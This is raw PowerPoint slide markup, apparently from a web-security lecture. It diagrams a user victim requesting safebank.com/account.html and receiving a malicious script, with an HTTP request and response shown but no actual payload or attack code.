              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>REQUEST:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="1950"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="90"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET /account.html HTTP/1.1  Host:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>www.safebank.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF517456-CB06-2545-826D-F8FA458C09D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4571999" y="5751879"/>
            <a:ext cx="2159000" cy="657860"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="3E3E3E"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>RESPONSE:</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1650"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>HTTP/1.0 200</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPts val="1664"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;HTML&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>. . .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;/HTML&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED3571D3-F056-F240-94EC-C2E6F712FBEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7414478" y="4415435"/>
            <a:ext cx="1589441" cy="2090736"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{123C9F70-195A-5C4B-9CF8-F8A583412A5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="165337" y="4842020"/>
            <a:ext cx="929294" cy="1731915"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3290E6F6-876A-8E4F-94A5-F217FEF01E37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2295524" y="4414520"/>
            <a:ext cx="774700" cy="320601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marR="5080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Alice</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC8B300D-F4C1-C040-84AF-CDA0934FFC97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142999" y="4004355"/>
            <a:ext cx="1132840" cy="130810"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1132839" h="130810">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1132731" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1132731" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="130764"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC816D8-718D-614E-8FB9-549261075B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1190624" y="3966946"/>
            <a:ext cx="1917700" cy="177800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="1" spc="-5" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>safebank.com/account.html</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34394388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09600" y="2678536"/>
            <a:ext cx="1417532" cy="1264284"/>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5959475" y="4979988"/>
            <a:ext cx="1148521" cy="1406460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="301625" y="3901440"/>
            <a:ext cx="1290955" cy="330200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>User</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-85" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Victim</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2738120" cy="958850"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2738120" h="958850">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2738079" y="958251"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="28574">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4957734" y="4865417"/>
            <a:ext cx="122523" cy="89237"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="3122839" y="4088279"/>
            <a:ext cx="1780337" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-172" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1080000">
            <a:off x="2399357" y="4595477"/>
            <a:ext cx="2600061" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>receive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-145" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3000" spc="-7" baseline="-2777" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800080"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:endParaRPr sz="3000" baseline="-2777">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="176405" y="365013"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2713093" y="3703693"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="364489" h="365125">
                <a:moveTo>
                  <a:pt x="8229" y="128133"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="28908" y="83745"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59466" y="47595"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97721" y="20826"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141495" y="4580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="188607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="236879" y="8229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299433" y="42302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="344187" y="97721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364325" y="166047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364061" y="201666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356784" y="236879"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="336104" y="281267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="305547" y="317417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267292" y="344186"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223518" y="360433"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176405" y="365013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="128133" y="356784"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83746" y="336104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47596" y="305546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20826" y="267291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4580" y="223518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176405"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8229" y="128133"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12699">
            <a:solidFill>
              <a:srgbClr val="B7C1EB"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1020000">
            <a:off x="2778214" y="3757967"/>
            <a:ext cx="290497" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B7C1EB"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2084502" y="4086339"/>
            <a:ext cx="364490" cy="365125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
